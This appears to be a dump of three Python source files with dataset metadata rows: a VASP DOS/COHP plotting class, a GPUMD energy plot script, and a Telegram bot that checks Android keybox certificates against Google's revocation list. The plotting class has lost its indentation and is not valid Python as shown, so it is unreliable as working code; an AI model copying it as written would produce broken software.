def add_cohp(self, label, cohp:Cohp):
"""Add a COHP for plotting.
        Pasted from elsewhere.
Args:
label: Label for the COHP. Must be unique.
cohp: COHP object.
"""
energies = cohp.energies - cohp.efermi if self.zero_at_efermi else cohp.energies
populations = cohp.get_cohp()
int_populations = cohp.get_icohp()
self._cohps[label] = {
"energies": energies,
"COHP": populations,
"ICOHP": int_populations,
"efermi": cohp.efermi,
}
@staticmethod
def get_orb_list(orb: str):
"""
:param orb: str 4d or 5p
:return:
"""
result = []
for i in Orbital:
if str(i.orbital_type) == orb[1:]:
result.append(orb[:1] + i.name)
return result
def compose_orbit(self,orb):
"""
        Split and recombine the given orbital-pair specification.
:param orb: 4d-5p or 4d-5px or 4dx2-5p
:return:
"""
a, b = orb.split("-")
a_orb = [a] if a[-1] not in ["s", "p", "d", "f"] else self.get_orb_list(a)
b_orb = [b] if b[-1] not in ["s", "p", "d", "f"] else self.get_orb_list(b)
result = []
for a, b in product(a_orb, b_orb):
result.append(f"{a}-{b}")
return result
def parse_config(self,dos_config:dict, cohp_config:dict):
"""
        Parse the projection configuration and store what needs to be plotted in dictionaries.
:param dos_config: dict
:param cohp_config: dict
:return:
Examples
-----
dos_conf = {"vasprun_path": "../cache/Cs1Ag0.5Bi0.5I3/vasprun.xml",
"projected": {"I": ["p"],"Ag": [ "d"],"Bi": ["p" ] },
}
cohp_conf={
"cohpcar_path":"../cache/Cs1Ag0.5Bi0.5I3/COHPCAR.lobster",
"poscar_path":"../cache/Cs1Ag0.5Bi0.5I3/POSCAR",
"projected": {"I": ["p"], "Ag": ["d"], "Bi": ["p"]}
}
plotter=DosCohpPlotter()
plotter.parse_config(dos_conf,cohp_conf)
"""
        # Parse the DOS part
orb_map = ["s", "p", "d", "f"]
vasprun = Vasprun(dos_config["vasprun_path"], parse_potcar_file=False)
        # The total DOS could be added here; skipped for now to focus on the projections
# self.add_dos("total", vasprun.tdos)
for elem, orbits in dos_config["projected"].items():
if isinstance(elem, int):
site = vasprun.final_structure[elem - 1]
elem = site.label
elem_dos = vasprun.complete_dos.get_site_spd_dos(site)
else:
elem_dos = vasprun.complete_dos.get_element_spd_dos(elem)
for orb in orbits:
orb_type = OrbitalType(orb_map.index(orb))
self.add_dos(f"{elem}-{orb}", elem_dos[orb_type])
        # Parse the COHP part
complete_cohp = CompleteCohp.from_file(filename=cohp_config["cohpcar_path"], fmt='LOBSTER',
structure_file=cohp_config["poscar_path"])
for elem_label, config in cohp_config["projected"].items():
if isinstance(config["label"], tuple):
label = [str(i) for i in range(config["label"][0], config["label"][1] + 1)]
else:
label = config["label"]
cohp=None
for orb in config["orb"]:
for _orb in self.compose_orbit(orb):
# complete_cohp.get_summed_cohp_by_label_list()
_cohp = complete_cohp.get_summed_cohp_by_label_and_orbital_list(label,[_orb] * len(label))
if cohp is None:
cohp=_cohp
else:
                        # Sum over orbitals
if Spin.up in cohp.cohp.keys():
cohp.cohp[Spin.up]+=_cohp.cohp[Spin.up]
if Spin.down in cohp.cohp.keys():
cohp.cohp[Spin.down] += _cohp.cohp[Spin.down]
if cohp:
self.add_cohp(elem_label, cohp)
def get_plot(self, energy_lim=(-2, 2), density_lim=(-10, 10), cohp_lim=(-5,5), invert_axes=False):
if invert_axes:
            # Inverted (side-by-side) layout: DOS on the left, COHP on the right
pass
gridspec = self.figure.add_gridspec(1, 2,
wspace=0.1 ,
width_ratios=[1,1],
)
else:
            # Stacked layout: DOS on top, COHP below
gridspec = self.figure.add_gridspec(2, 1,
hspace=0.1 ,
height_ratios=[1,1],
)
        # Plot the DOS first
dos_axes=self.figure.add_subplot(gridspec[0])
n_colors = min(9, max(3, len(self._doses)))
colors = palettable.colorbrewer.qualitative.Set1_9.mpl_colors
all_pts = []
idx=0
for idx, key in enumerate(self._doses.keys()):
for spin in [Spin.up, Spin.down]:
if spin in self._doses[key]["densities"]:
energy = self._doses[key]["energies"]
densities = list(int(spin) * self._doses[key]["densities"][spin])
if invert_axes:
x = densities
y = energy
else:
x = energy
y = densities
all_pts.extend(list(zip(x, y)))
if self.stack:
dos_axes.fill(x, y, color=colors[idx % n_colors], label=str(key))
else:
dos_axes.plot(x, y, color=colors[idx % n_colors], label=str(key) )
        # Plot the COHP
cohp_axes = self.figure.add_subplot(gridspec[1])
n_colors = min(9, max(3, len(self._cohps)))
for idx, key in enumerate(self._cohps.keys()):
energies = self._cohps[key]["energies"]
populations = self._cohps[key]["COHP"]
for spin in [Spin.up, Spin.down]:
if spin in populations:
if invert_axes:
x = -populations[spin]
y = energies
else:
x = energies
y = -populations[spin]
if spin == Spin.up:
cohp_axes.plot(
x,
y,
color=colors[idx % n_colors],
linestyle="-",
label=str(key),
)
else:
cohp_axes.plot(x, y, color=colors[idx % n_colors], linestyle="--", linewidth=3)
cohp_axes.tick_params(axis='both', which='both', direction='in')
dos_axes.tick_params(axis='both', which='both', direction='in')
energy_label = "$E - E_f$ (eV)" if self.zero_at_efermi else "Energy (eV)"
energy_label="Energy (eV)"
if invert_axes:
            # Draw a horizontal line at zero energy across both panels
con = ConnectionPatch(xyA=(density_lim[0],0), xyB=(cohp_lim[1],0), coordsA="data", coordsB="data",
axesA=dos_axes, axesB=cohp_axes, color="k",linestyle="--", linewidth=0.5)
cohp_axes.add_artist(con)
cohp_axes.text(0.1 , 0.1, 'Antibonding', transform=cohp_axes.transAxes,rotation="vertical" , color='k')
cohp_axes.text(0.8, 0.16, 'Bonding', transform=cohp_axes.transAxes,rotation="vertical" , color='k')
# cohp_axes.set_xticklabels([])
cohp_axes.set_yticklabels([])
cohp_axes.set_xlim(cohp_lim)
cohp_axes.set_ylim(energy_lim)
cohp_axes.axvline(x=0, color="k", linestyle="-", linewidth=0.5)
handles, labels = cohp_axes.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
cohp_axes.legend(label_dict.values(), label_dict, loc="upper right" )
cohp_axes.set_xlabel("-COHP")
# dos_axes.set_xticklabels([])
dos_axes.axvline(x=0, color="k", linestyle="-", linewidth=0.5 )
dos_axes.set_xlim(density_lim)
dos_axes.set_ylim(energy_lim)
dos_axes.set_ylabel(energy_label)
dos_axes.set_xlabel("DOS (states/eV)")
handles, labels = dos_axes.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
dos_axes.legend(label_dict.values(), label_dict, loc="upper right" )
else:
con = ConnectionPatch(xyA=( 0,density_lim[1]), xyB=(0,cohp_lim[0]), coordsA="data", coordsB="data",
axesA=dos_axes, axesB=cohp_axes, color="k",linestyle="--")
cohp_axes.add_artist(con)
cohp_axes.text(0.2 , 0.1, 'Antibonding', transform=cohp_axes.transAxes, color='k')
cohp_axes.text(0.2 , 0.7, 'Bonding', transform=cohp_axes.transAxes, color='k')
# cohp_axes.set_yticklabels([])
cohp_axes.axhline(y=0, color="k", linestyle="-" )
cohp_axes.set_ylim(cohp_lim)
cohp_axes.set_xlim(energy_lim)
cohp_axes.set_ylabel("-COHP")
cohp_axes.set_xlabel(energy_label)
dos_axes.set_xticklabels([])
# dos_axes.set_yticklabels([])
dos_axes.set_xlim(energy_lim)
dos_axes.set_ylim(density_lim)
dos_axes.axhline(y=0, color="k", linestyle="-" )
dos_axes.set_ylabel("DOS (states/eV)")
handles, labels = dos_axes.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
dos_axes.legend(label_dict.values(), label_dict,ncols=2, loc="upper right" )
handles, labels = cohp_axes.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
cohp_axes.legend(label_dict.values(), label_dict,ncols=2, loc="upper right" )
        # Adjust here if there is too much white space around the figure
plt.subplots_adjust(left=0.1, right=0.9 ,bottom=0.1, top=0.9 )
if __name__ == '__main__':
# dos_conf = {"vasprun_path": "../cache/Cs1Ag0.5Bi0.5I3/vasprun.xml",
# "projected": {"I": ["p"],"Ag": [ "d"],"Bi": ["s","p" ] },
# }
#
# cohp_conf={
# "cohpcar_path":"../cache/Cs1Ag0.5Bi0.5I3/COHPCAR.lobster",
# "poscar_path":"../cache/Cs1Ag0.5Bi0.5I3/POSCAR",
# "projected": {"Bi(6s)-I(5p)":{
# "label":(185,190),
# "orb":["6s-5p"]
# },
# "Bi(6p)-I(5p)": {
# "label": (185, 190),
# "orb": ["6p-5p"]
# },
# "Ag(4d)-I(5p)": {
# "label": (161, 166),
# "orb": ["4d-5p"]
# }
# }
#
# }
sb_dos_conf = {"vasprun_path": "../cache/Cs8Ag4Bi3Sb1I24/vasprun.xml",
"projected": {"I": ["p"],"Ag": [ "d"],"Bi": ["s","p" ] , "Sb": ["s","p" ] },
}
sb_cohp_conf={
"cohpcar_path":"../cache/Cs8Ag4Bi3Sb1I24/COHPCAR.lobster",
"poscar_path":"../cache/Cs8Ag4Bi3Sb1I24/POSCAR",
"projected": {"Bi(6s)-I(5p)":{
"label":(185,190),
"orb":["6s-5p"]
},
"Bi(6p)-I(5p)": {
"label": (185, 190),
"orb": ["6p-5p"]
},
"Sb(5s)-I(5p)": {
"label": (203, 208),
"orb": ["5s-5p"]
},
"Sb(5p)-I(5p)": {
"label": (203, 208),
"orb": ["5p-5p"]
},
"Ag(4d)-I(5p)": {
"label": (161, 166),
"orb": ["4d-5p"]
}
}
}
# cu_dos_conf = {"vasprun_path": "../cache/Cu/vasprun.xml",
# "projected": {"I": ["p"], "Ag": ["d"], "Bi": ["s", "p"], "Cu": ["d"]},
# }
#
# cu_cohp_conf = {
# "cohpcar_path": "../cache/Cu/COHPCAR.lobster",
# "poscar_path": "../cache/Cu/POSCAR",
# "projected": {"Bi(6s)-I(5p)": {
# "label": (185, 190),
# "orb": ["6s-5p"]
# },
# "Bi(6p)-I(5p)": {
# "label": (185, 190),
# "orb": ["6p-5p"]
# },
#
# "Cu(4d)-I(5p)": {
# "label": (161, 166),
# "orb": ["3d-5p"]
# },
# "Ag(4d)-I(5p)": {
# "label": (167, 172),
# "orb": ["4d-5p"]
# }
# }
#
# }
    # Individual orbitals such as "6px-5px" can be given here; otherwise all sub-orbitals are summed
plotter=DosCohpPlotter()
plotter.parse_config(sb_dos_conf,sb_cohp_conf)
plotter.get_plot(invert_axes=True,cohp_lim=(-10,20),energy_lim=(-2,2),density_lim=(0,10))
plt.savefig("dos_and_cohp_sb.png") | 14,961 | Python | .py | 338 | 30.653846 | 117 | 0.477212 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,180 | plot_gpumd_result.py | aboys-cb_VaspTool/script/plot/plot_gpumd_result.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/13 22:23
# @Author : 兵
# @email : [email protected]
import os.path
import matplotlib
matplotlib.use('Agg')
from gpyumd.load import load_thermo
import matplotlib.pyplot as plt
if os.path.exists("thermo.out"):
data = load_thermo()
plt.plot(list(range(data["U"].shape[0])), data["U"])
plt.savefig("./energy.png", dpi=150)
else:
print("没有找到画图文件,请完善逻辑!")
| 473 | Python | .py | 16 | 25.25 | 56 | 0.674584 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,181 | main.py | chitang233_KeyboxChecker/main.py | import subprocess
import tempfile
import re
import requests
import telebot
from os import getenv
def verify_certificate_chain(keybox):
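    """Check the certificate chain embedded in a keybox: extract the PEM certificates,
    compare the root certificate's public key against Google's CA key (google_ca_pubkey.key),
    and verify the chain with `openssl verify`. Returns a human-readable status message."""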
keybox = keybox.replace("\r\n", "\n")
keybox = keybox.split("</CertificateChain>")[0]
pattern = r"-----BEGIN CERTIFICATE-----\n.*?\n-----END CERTIFICATE-----"
certificates = re.findall(pattern, keybox, re.DOTALL)
if len(certificates) < 2:
return "❓ Invalid certificate chain"
elif len(certificates) == 2:
certificates = {"end_entity": certificates[0], "root": certificates[1]}
elif len(certificates) == 3:
certificates = {"end_entity": certificates[0], "intermediate": certificates[1], "root": certificates[2]}
else:
return "❓ Invalid certificate chain"
with tempfile.NamedTemporaryFile(delete=True) as root_cert_file:
root_cert_file.write(certificates['root'].encode())
root_cert_file.flush()
root_pubkey = subprocess.run(
['openssl', 'x509', '-in', root_cert_file.name, '-pubkey', '-noout'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
if root_pubkey.returncode != 0:
return f"OpenSSL error: {root_pubkey.stderr}"
if root_pubkey.returncode == 0:
with open("google_ca_pubkey.key", "r") as google_pubkey_file:
google_pubkey = google_pubkey_file.read()
if root_pubkey.stdout.encode() != google_pubkey.encode():
message = "❌ Root certificate is not signed by Google"
else:
message = "✅ Root certificate is signed by Google"
with tempfile.NamedTemporaryFile(delete=True) as end_entity_cert_file:
end_entity_cert_file.write(certificates['end_entity'].encode())
end_entity_cert_file.flush()
if "intermediate" in certificates:
with tempfile.NamedTemporaryFile(delete=True) as intermediate_cert_file:
intermediate_cert_file.write(certificates['intermediate'].encode())
intermediate_cert_file.flush()
result = subprocess.run(
['openssl', 'verify', '-CAfile', root_cert_file.name, '-untrusted', intermediate_cert_file.name, end_entity_cert_file.name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
else:
result = subprocess.run(
['openssl', 'verify', '-CAfile', root_cert_file.name, end_entity_cert_file.name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
if result.returncode != 0:
message += f"\n❌ Invalid certificate chain: {result.stderr}"
else:
message += "\n✅ Certificate chain is valid"
return message
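# Runs `openssl x509 -text` on a PEM certificate and returns [serial_number, subject],
# where the serial number is a plain hex string without the "0x" prefix; on parsing
# failure an error string is returned instead, so callers need to handle that case.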
def extract_certificate_information(cert_pem):
with tempfile.NamedTemporaryFile(delete=True) as temp_cert_file:
temp_cert_file.write(cert_pem.encode())
temp_cert_file.flush()
result = subprocess.run(
['openssl', 'x509', '-text', '-noout', '-in', temp_cert_file.name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
if result.returncode != 0:
raise RuntimeError(f"OpenSSL error: {result.stderr}")
cert_text = result.stdout
pattern = r"Serial Number:\s*([\da-f:]+)"
match = re.search(pattern, cert_text, re.IGNORECASE)
if match:
serial_number = hex(int(match.group(1).replace(":", ""), 16)).split("0x")[1]
else:
return "❌ Cannot find serial number"
pattern = r"Subject: "
match = re.search(pattern, cert_text, re.IGNORECASE)
if match:
subject = cert_text[match.end():].split("\n")[0]
else:
return "❌ Cannot find subject"
return [serial_number, subject]
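# Shared handler for document uploads and the /keybox command: downloads the attached
# keybox file via the Bot API, extracts the first certificate's serial number and
# subject, verifies the certificate chain, and checks the serial against Google's
# attestation revocation list before replying.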
def common_handler(message):
if message.reply_to_message and message.reply_to_message.document:
document = message.reply_to_message.document
elif message.document:
document = message.document
else:
bot.reply_to(message, "Please reply to a message with a keybox file or send a keybox file")
return None
file_info = bot.get_file(document.file_id)
file = requests.get('https://api.telegram.org/file/bot{0}/{1}'.format(API_TOKEN, file_info.file_path))
certificate = extract_certificate_information(file.text.split("<Certificate format=\"pem\">")[1].split("</Certificate>")[0])
reply = f"ℹ️ Serial Number: `{certificate[0]}`\nℹ️ Subject: `{certificate[1]}`"
reply += f"\n{verify_certificate_chain(file.text)}"
try:
status = get_google_sn_list()['entries'][certificate[0]]
reply += f"\n❌ Serial number found in Google's revoked keybox list\nReason: `{status['reason']}`"
except KeyError:
if certificate[0] == "4097":
reply += "\n❌ AOSP keybox found, this keybox is untrusted"
else:
reply += "\n✅ Serial number not found in Google's revoked keybox list"
bot.reply_to(message, reply, parse_mode='Markdown')
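# Fetches Google's attestation revocation list (a JSON map of revoked serial numbers
# to status entries), sending no-cache headers so the check is not served stale data.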
def get_google_sn_list():
url = "https://android.googleapis.com/attestation/status"
response = requests.get(
url,
headers={
"Cache-Control": "max-age=0, no-cache, no-store, must-revalidate",
"Pragma": "no-cache",
"Expires": "0",
}
).json()
return response
API_TOKEN = getenv('API_TOKEN')
bot = telebot.TeleBot(API_TOKEN)
@bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
bot.reply_to(message, "Send me keybox file and I will check if it's revoked")
@bot.message_handler(content_types=['document'])
def handle_document(message):
common_handler(message)
@bot.message_handler(commands=['keybox'])
def handle_keybox(message):
common_handler(message)
bot.infinity_polling()
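# Minimal run sketch (assumes pyTelegramBotAPI, requests and the openssl CLI are
# installed, and that google_ca_pubkey.key sits next to this script):
#   export API_TOKEN=<your bot token>
#   python main.py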
| 5,253 | Python | .py | 133 | 36.12782 | 130 | 0.716088 | chitang233/KeyboxChecker | 8 | 0 | 0 | AGPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |